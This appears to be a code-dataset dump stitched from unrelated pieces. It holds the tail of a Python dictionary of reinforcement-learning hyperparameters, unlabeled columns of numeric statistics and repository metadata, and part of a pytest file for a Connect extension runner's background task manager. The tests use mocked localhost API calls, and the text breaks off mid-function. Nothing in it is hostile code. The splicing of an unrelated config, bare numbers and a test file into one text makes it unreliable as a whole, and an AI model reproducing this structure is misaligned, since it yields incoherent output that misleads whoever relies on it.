            "tau": 0.001,
            "lr": 0.0005,
            "loss_att_weight": 2,
            "dynamic_eps": True,
            "minimal_eff_bs": 208,
        },
    },
    "MountainCar-v0": {
        "DQN": {
            "eff_batch_size": 256,
            "lr": 0.001,
            "eps_decay": 0.98,
            "tau": 0.01,
        },
        "BootstrapDQN": {
            "eff_batch_size": 256,
            "lr": 0.001,
            "eps_decay": 0.98,
            "tau": 0.05,
            "mask_prob": 0.5,
            "prior_scale": 10,
        },
        "SunriseDQN": {
            "eff_batch_size": 256,
            "lr": 0.001,
            "eps_decay": 0.98,
            "tau": 0.05,
            "mask_prob": 0.5,
            "prior_scale": 10,
            "sunrise_temp": 50,
        },
        "IV_DQN": {
            "eff_batch_size": 256,
            "lr": 0.001,
            "eps_decay": 0.98,
            "tau": 0.05,
            "mask_prob": 0.5,
            "prior_scale": 10,
            "eps": 1000,
        },
        "IV_ProbEnsembleDQN": {
            "eff_batch_size": 256,
            "lr": 0.001,
            "eps_decay": 0.98,
            "tau": 0.05,
            "mask_prob": 0.5,
            "prior_scale": 10,
            "eps": 1000,
        },
    },
    "gym_cheetah": {
        "EnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.9,
            "ucb_lambda": 0,
        },
        "IV_EnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.9,
            "ucb_lambda": 10,
            "minimal_eff_bs_ratio": 0.99,
            "dynamic_eps": True,
        },
        "IV_ProbEnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 1,
            "ucb_lambda": 0,
            "minimal_eff_bs_ratio": 0.99,
            "dynamic_eps": True,
            "loss_att_weight": 2,
        },
        "IV_SAC": {
            "eff_batch_size": 1024,
            "mask_prob": 1,
            "ucb_lambda": 0,
            "minimal_eff_bs_ratio": 0.99,
            "dynamic_eps": True,
            "loss_att_weight": 2,
        },
        "IV_ProbSAC": {
            "loss_att_weight": 5,
            "minimal_eff_bs_ratio": 0.5,
        },
    },
    "gym_walker2d": {
        "EnsembleSAC": {
            "eff_batch_size": 512,
            "mask_prob": 1,
            "ucb_lambda": 1,
        },
        "IV_EnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.9,
            "ucb_lambda": 10,
            "minimal_eff_bs_ratio": 0.8,
            "dynamic_eps": True,
        },
        "IV_ProbEnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.9,
            "ucb_lambda": 10,
            "minimal_eff_bs_ratio": 0.8,
            "dynamic_eps": True,
            "loss_att_weight": 5,
        },
        "IV_SAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.9,
            "ucb_lambda": 10,
            "minimal_eff_bs_ratio": 0.8,
            "dynamic_eps": True,
            "loss_att_weight": 5,
        },
    },
    "gym_hopper": {
        "EnsembleSAC": {
            "eff_batch_size": 512,
            "mask_prob": 1,
            "ucb_lambda": 10,
        },
        "IV_ProbEnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.7,
            "ucb_lambda": 10,
            "minimal_eff_bs_ratio": 0.8,
            "dynamic_eps": True,
            "loss_att_weight": 10,
        },
        "IV_SAC": {
            "eff_batch_size": 1024,
            "mask_prob": 0.7,
            "ucb_lambda": 10,
            "minimal_eff_bs_ratio": 0.8,
            "dynamic_eps": True,
            "loss_att_weight": 10,
        },
    },
    "gym_ant": {
        "EnsembleSAC": {
            "eff_batch_size": 512,
            "mask_prob": 0.9,
            "ucb_lambda": 10,
        },
        "IV_ProbEnsembleSAC": {
            "eff_batch_size": 1024,
            "mask_prob": 1,
            "ucb_lambda": 1,
            "minimal_eff_bs_ratio": 0.9,
            "dynamic_eps": True,
            "loss_att_weight": 5,
        },
        "IV_SAC": {
            "eff_batch_size": 1024,
            "mask_prob": 1,
            "ucb_lambda": 1,
            "minimal_eff_bs_ratio": 0.9,
            "dynamic_eps": True,
            "loss_att_weight": 5,
        },
    },
    "cartpole": {
        "BootstrapDQN": {
            "batch_size": 128,
            # NOTE(review): mask_prob 5 looks out of range for a probability --
            # confirm against the consumer before changing.
            "mask_prob": 5,
        },
        # FIX: the original literal defined "IV_BootstrapDQN" twice with
        # equivalent values; Python silently keeps only the last, so the
        # duplicate is merged into this single entry (behavior unchanged).
        "IV_BootstrapDQN": {
            "batch_size": 128,
            "mask_prob": 0.5,
            "minimal_eff_bs_ratio": 0.99,
        },
        "IV_ProbEnsembleDQN": {
            "batch_size": 128,
            "mask_prob": 0.5,
            "minimal_eff_bs_ratio": 0.99,
            "loss_att_weight": 10,
        },
        "IV_ProbDQN": {
            "loss_att_weight": 0.1,
            "minimal_eff_bs_ratio": 0.7,
        },
        "ProbEnsembleDQN": {
            "batch_size": 128,
            "loss_att_weight": 10,
            "mask_prob": 0.5,
        },
    },
}
| 18.318681
| 38
| 0.420066
| 716
| 6,668
| 3.581006
| 0.103352
| 0.112324
| 0.126365
| 0.099454
| 0.880265
| 0.846724
| 0.804212
| 0.781591
| 0.781591
| 0.778861
| 0
| 0.112395
| 0.428914
| 6,668
| 363
| 39
| 18.369146
| 0.560924
| 0
| 0
| 0.711538
| 0
| 0
| 0.347383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4056394ea1442fe773de4cc6e8fb8fa335cbc33
| 32,794
|
py
|
Python
|
tests/managers/test_background.py
|
bdjilka/connect-extension-runner
|
7930b34dae92addb3807984fd553debc2b78ac23
|
[
"Apache-2.0"
] | null | null | null |
tests/managers/test_background.py
|
bdjilka/connect-extension-runner
|
7930b34dae92addb3807984fd553debc2b78ac23
|
[
"Apache-2.0"
] | null | null | null |
tests/managers/test_background.py
|
bdjilka/connect-extension-runner
|
7930b34dae92addb3807984fd553debc2b78ac23
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import time
import pytest
from connect.eaas.config import ConfigHelper
from connect.eaas.constants import (
ASSET_REQUEST_TASK_TYPES,
BACKGROUND_TASK_TYPES,
LISTING_REQUEST_TASK_TYPES,
TASK_TYPE_EXT_METHOD_MAP,
TIER_CONFIG_REQUEST_TASK_TYPES,
)
from connect.eaas.dataclasses import (
ConfigurationPayload,
Message,
MessageType,
ResultType,
TaskCategory,
TaskPayload,
TaskType,
)
from connect.eaas.extension import ProcessingResponse
from connect.eaas.handler import ExtensionHandler
from connect.eaas.managers import BackgroundTasksManager
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    BACKGROUND_TASK_TYPES,
)
async def test_sync(mocker, extension_cls, task_type, config_payload):
    """A background task handled by a *sync* extension puts a SUCCESS result on the queue."""
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    # Declare the extension capable of handling `task_type` for 'pending' objects.
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    # Pin time.monotonic so the measured elapsed time is deterministic.
    mocked_time = mocker.patch('connect.eaas.managers.background.time')
    mocked_time.sleep = time.sleep
    mocked_time.monotonic.side_effect = (1.0, 2.0)
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type])
    handler.extension_type = 'sync'
    # Spy on the results queue instead of draining it.
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    manager.get_argument = mocker.AsyncMock(return_value={'id': 'PR-000', 'status': 'pending'})
    task = TaskPayload(
        'TQ-000',
        TaskCategory.BACKGROUND,
        task_type,
        'PR-000',
        runtime=1.0,
    )
    await manager.submit(task)
    # Yield to the event loop so the submitted task can complete.
    await asyncio.sleep(.01)
    message = Message(message_type=MessageType.TASK, data=task)
    message.data.result = ResultType.SUCCESS
    result_queue.assert_awaited_once_with(message.data)
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    BACKGROUND_TASK_TYPES,
)
async def test_async(mocker, extension_cls, task_type, config_payload):
    """A background task handled by an *async* extension puts a SUCCESS result on the queue."""
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    # Declare the extension capable of handling `task_type` for 'pending' objects.
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    # Pin time.monotonic so the measured elapsed time is deterministic.
    mocked_time = mocker.patch('connect.eaas.managers.background.time')
    mocked_time.sleep = time.sleep
    mocked_time.monotonic.side_effect = (1.0, 2.0)
    handler = ExtensionHandler(config)
    # Same flow as test_sync, but the extension method is an async coroutine.
    handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type], async_impl=True)
    handler.extension_type = 'async'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    manager.get_argument = mocker.AsyncMock(return_value={'id': 'PR-000', 'status': 'pending'})
    task = TaskPayload(
        'TQ-000',
        TaskCategory.BACKGROUND,
        task_type,
        'PR-000',
        runtime=1.0,
    )
    await manager.submit(task)
    # Yield to the event loop so the submitted task can complete.
    await asyncio.sleep(.01)
    message = Message(message_type=MessageType.TASK, data=task)
    message.data.result = ResultType.SUCCESS
    result_queue.assert_awaited_once_with(message.data)
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    ASSET_REQUEST_TASK_TYPES,
)
async def test_get_argument_subscription(
    mocker, httpx_mock, extension_cls, task_type,
    config_payload, task_payload, unused_port,
):
    """get_argument() returns the asset request object fetched from the API."""
    # Point the runner environment at a local (mocked) API endpoint.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type], async_impl=True)
    handler.extension_type = 'async'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    pr_data = {'id': 'PR-000', 'status': 'pending'}
    # First response: the status-filter count query (Content-Range says 1 match);
    # second response: the actual request object.
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/requests?and(eq(id,PR-000),in(status,(pending)))&limit=0&offset=0',
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/requests/PR-000',
        json=pr_data,
    )
    task = TaskPayload(
        **task_payload(TaskCategory.BACKGROUND, task_type, 'PR-000'),
    )
    assert await manager.get_argument(task) == pr_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    TIER_CONFIG_REQUEST_TASK_TYPES,
)
async def test_get_argument_tcr(
    mocker, httpx_mock, extension_cls, task_type,
    config_payload, task_payload, unused_port,
):
    """get_argument() returns the tier config request object fetched from the API."""
    # Point the runner environment at a local (mocked) API endpoint.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(return_value={task_type: ['pending']}),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(TASK_TYPE_EXT_METHOD_MAP[task_type], async_impl=True)
    handler.extension_type = 'async'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    tcr_data = {'id': 'TCR-000', 'status': 'pending'}
    # First response: the status-filter count query; second: the object fetch.
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/tier/config-requests?'
            'and(eq(id,TCR-000),in(status,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/tier/config-requests/TCR-000',
        json=tcr_data,
    )
    task = TaskPayload(
        **task_payload(TaskCategory.BACKGROUND, task_type, 'TCR-000'),
    )
    assert await manager.get_argument(task) == tcr_data
@pytest.mark.asyncio
async def test_get_argument_tar(
    mocker, httpx_mock, extension_cls,
    config_payload, task_payload, unused_port,
):
    """get_argument() returns the tier account request when a preview-connection asset exists."""
    # Point the runner environment at a local (mocked) API endpoint.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
    )
    handler.extension_type = 'sync'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    # Status-filter count query for the TAR.
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/tier/account-requests?'
            'and(eq(id,TAR-000),in(status,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    tar_data = {
        'id': 'TAR-000',
        'status': 'pending',
        'account': {'id': 'TA-000'},
        'product': {'id': 'PRD-000'},
    }
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/tier/account-requests/TAR-000',
        json=tar_data,
    )
    # Asset lookup: Content-Range reports one matching preview-connection asset.
    assets_filter = (
        'and(eq(product.id,PRD-000),eq(connection.type,preview),'
        'or(eq(tiers.tier2.id,TA-000),eq(tiers.tier1.id,TA-000),eq(tiers.customer.id,TA-000)))'
        '&limit=0&offset=0'
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/assets?{assets_filter}',
        headers={'Content-Range': 'items 0-1/1'},
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND,
            TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
            'TAR-000',
        ),
    )
    assert await manager.get_argument(task) == tar_data
@pytest.mark.asyncio
async def test_get_argument_tar_no_assets(
    mocker, httpx_mock, extension_cls,
    config_payload, task_payload, unused_port,
):
    """get_argument() returns None and sends a skip response when the TAR has no preview assets."""
    # Point the runner environment at a local (mocked) API endpoint.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
    )
    handler.extension_type = 'sync'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    # Spy on the skip-response path so we can assert on it at the end.
    manager.send_skip_response = mocker.MagicMock()
    tar_data = {
        'id': 'TAR-000',
        'status': 'pending',
        'account': {'id': 'TA-000'},
        'product': {'id': 'PRD-000'},
    }
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/tier/account-requests?'
            'and(eq(id,TAR-000),in(status,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/tier/account-requests/TAR-000',
        json=tar_data,
    )
    assets_filter = (
        'and(eq(product.id,PRD-000),eq(connection.type,preview),'
        'or(eq(tiers.tier2.id,TA-000),eq(tiers.tier1.id,TA-000),eq(tiers.customer.id,TA-000)))'
        '&limit=0&offset=0'
    )
    # Asset lookup: Content-Range reports *zero* matching preview assets.
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/assets?{assets_filter}',
        headers={'Content-Range': 'items 0-0/0'},
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND,
            TaskType.TIER_ACCOUNT_UPDATE_REQUEST_PROCESSING,
            'TAR-000',
        ),
    )
    assert await manager.get_argument(task) is None
    manager.send_skip_response.assert_called_once_with(
        task,
        (
            'The Tier Account related to this request does not '
            'have assets with a preview connection.'
        ),
    )
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    LISTING_REQUEST_TASK_TYPES,
)
async def test_get_argument_listing_request(
    mocker, httpx_mock, extension_cls, task_type,
    config_payload, task_payload, unused_port,
):
    """get_argument() returns the listing request; the marketplace hubs are also fetched."""
    # Point the runner environment at a local (mocked) API endpoint.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={task_type: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        task_type,
    )
    handler.extension_type = 'sync'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    # Listing requests filter on `state` (not `status` as the other objects do).
    lstr_data = {
        'id': 'LSTR-000',
        'state': 'pending',
        'listing': {'contract': {'marketplace': {'id': 'MP-0000'}}},
        'product': {'id': 'PRD-000'},
    }
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/listing-requests?'
            'and(eq(id,LSTR-000),in(state,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/listing-requests/LSTR-000',
        json=lstr_data,
    )
    # The marketplace referenced by the listing is fetched too (hub resolution).
    marketplace_data = {
        'hubs': [
            {
                'hub': {'id': 'HB-0000'},
            },
        ],
    }
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/marketplaces/MP-0000',
        json=marketplace_data,
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND,
            task_type,
            'LSTR-000',
        ),
    )
    assert await manager.get_argument(task) == lstr_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    LISTING_REQUEST_TASK_TYPES,
)
async def test_get_argument_listing_request_vendor(
    mocker, httpx_mock, extension_cls, task_type,
    config_payload, task_payload, unused_port,
):
    """get_argument returns the listing request as-is for a vendor install.

    With ``hub_id`` cleared (vendor side) the marketplace/hub ownership
    check is skipped, so only the count-filter and retrieve calls are mocked.
    """
    # Provide a complete fake runtime environment so ConfigHelper can be built.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    dyn_cfg = ConfigurationPayload(**config_payload)
    # A vendor installation has no hub: clear it so the hub check is skipped.
    dyn_cfg.hub_id = None
    config.update_dynamic_config(dyn_cfg)
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={task_type: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        task_type,
    )
    handler.extension_type = 'sync'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    lstr_data = {
        'id': 'LSTR-000',
        # Listing requests expose their state through the ``state`` field
        # (matching the ``in(state,(pending))`` filter below); was 'status'.
        'state': 'pending',
        'listing': {'contract': {'marketplace': {'id': 'MP-0000'}}},
        'product': {'id': 'PRD-000'},
    }
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/listing-requests?'
            'and(eq(id,LSTR-000),in(state,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/listing-requests/LSTR-000',
        json=lstr_data,
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND,
            task_type,
            'LSTR-000',
        ),
    )
    assert await manager.get_argument(task) == lstr_data
@pytest.mark.asyncio
@pytest.mark.parametrize(
    'task_type',
    LISTING_REQUEST_TASK_TYPES,
)
async def test_get_argument_listing_request_no_hub(
    mocker, httpx_mock, extension_cls, task_type,
    config_payload, task_payload, unused_port,
):
    """get_argument skips the task when the marketplace lists a foreign hub.

    The marketplace returns hub ``HB-0001`` which does not match the
    configured ``hub_id``, so ``None`` is returned and a skip response
    is sent with an explanatory message.
    """
    # Provide a complete fake runtime environment so ConfigHelper can be built.
    mocker.patch(
        'connect.eaas.config.get_environment',
        return_value={
            'ws_address': f'127.0.0.1:{unused_port}',
            'api_address': f'127.0.0.1:{unused_port}',
            'api_key': 'SU-000:XXXX',
            'environment_id': 'ENV-000-0001',
            'instance_id': 'INS-000-0002',
            'background_task_max_execution_time': 300,
            'interactive_task_max_execution_time': 120,
            'scheduled_task_max_execution_time': 43200,
        },
    )
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={task_type: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        task_type,
    )
    handler.extension_type = 'sync'
    result_queue = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, result_queue)
    # Spy on the skip path so the message can be asserted at the end.
    manager.send_skip_response = mocker.MagicMock()
    lstr_data = {
        'id': 'LSTR-000',
        # Listing requests expose their state through the ``state`` field
        # (matching the ``in(state,(pending))`` filter below); was 'status'.
        'state': 'pending',
        'listing': {'contract': {'marketplace': {'id': 'MP-0000'}}},
        'product': {'id': 'PRD-000'},
    }
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/listing-requests?'
            'and(eq(id,LSTR-000),in(state,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/listing-requests/LSTR-000',
        json=lstr_data,
    )
    # The marketplace belongs to HB-0001, not the configured hub.
    marketplace_data = {
        'hubs': [
            {
                'hub': {'id': 'HB-0001'},
            },
        ],
    }
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/marketplaces/MP-0000',
        json=marketplace_data,
    )
    task = TaskPayload(
        **task_payload(
            TaskCategory.BACKGROUND,
            task_type,
            'LSTR-000',
        ),
    )
    assert await manager.get_argument(task) is None
    manager.send_skip_response.assert_called_once_with(
        task,
        (
            'The marketplace MP-0000 does not belong '
            f'to hub {config.hub_id}.'
        ),
    )
@pytest.mark.asyncio
async def test_get_argument_usage_file(
    mocker, httpx_mock, extension_cls,
    config_payload, task_payload, unused_port,
):
    """The usage-file payload is fetched and returned for a supported status."""
    # Fake runtime environment so ConfigHelper can be constructed.
    environment = {
        'ws_address': f'127.0.0.1:{unused_port}',
        'api_address': f'127.0.0.1:{unused_port}',
        'api_key': 'SU-000:XXXX',
        'environment_id': 'ENV-000-0001',
        'instance_id': 'INS-000-0002',
        'background_task_max_execution_time': 300,
        'interactive_task_max_execution_time': 120,
        'scheduled_task_max_execution_time': 43200,
    }
    mocker.patch('connect.eaas.config.get_environment', return_value=environment)
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    # The extension declares support for 'pending' usage file requests.
    mocker.patch.object(
        ExtensionHandler,
        'capabilities',
        new_callable=mocker.PropertyMock(
            return_value={TaskType.USAGE_FILE_REQUEST_PROCESSING: ['pending']},
        ),
    )
    mocker.patch('connect.eaas.handler.get_extension_class')
    mocker.patch('connect.eaas.handler.get_extension_type')
    handler = ExtensionHandler(config)
    handler.extension_class = extension_cls(
        TASK_TYPE_EXT_METHOD_MAP[TaskType.USAGE_FILE_REQUEST_PROCESSING],
        async_impl=True,
    )
    handler.extension_type = 'async'
    queue_put = mocker.patch.object(asyncio.Queue, 'put')
    manager = BackgroundTasksManager(config, handler, queue_put)
    usage_file = {'id': 'UF-000', 'status': 'pending'}
    # First the count-only status filter, then the retrieve call.
    httpx_mock.add_response(
        method='GET',
        url=(
            f'{api_url}/usage/files?'
            'and(eq(id,UF-000),in(status,(pending)))&limit=0&offset=0'
        ),
        json=[],
        headers={'Content-Range': 'items 0-0/1'},
    )
    httpx_mock.add_response(
        method='GET',
        url=f'{api_url}/usage/files/UF-000',
        json=usage_file,
    )
    task = TaskPayload(
        **task_payload(TaskCategory.BACKGROUND, TaskType.USAGE_FILE_REQUEST_PROCESSING, 'UF-000'),
    )
    assert await manager.get_argument(task) == usage_file
@pytest.mark.asyncio
async def test_get_argument_usage_chunks(
    mocker, httpx_mock, extension_cls,
    config_payload, task_payload, unused_port,
):
    """The usage-chunk payload is fetched and returned for a supported status."""
    # Fake runtime environment so ConfigHelper can be constructed.
    environment = {
        'ws_address': f'127.0.0.1:{unused_port}',
        'api_address': f'127.0.0.1:{unused_port}',
        'api_key': 'SU-000:XXXX',
        'environment_id': 'ENV-000-0001',
        'instance_id': 'INS-000-0002',
        'background_task_max_execution_time': 300,
        'interactive_task_max_execution_time': 120,
        'scheduled_task_max_execution_time': 43200,
    }
    mocker.patch('connect.eaas.config.get_environment', return_value=environment)
    api_url = f'https://127.0.0.1:{unused_port}/public/v1'
    mocker.patch.object(ConfigHelper, 'get_api_url', return_value=api_url)
    config = ConfigHelper()
    config.update_dynamic_config(ConfigurationPayload(**config_payload))
    # The extension declares support for 'pending' usage chunk requests.
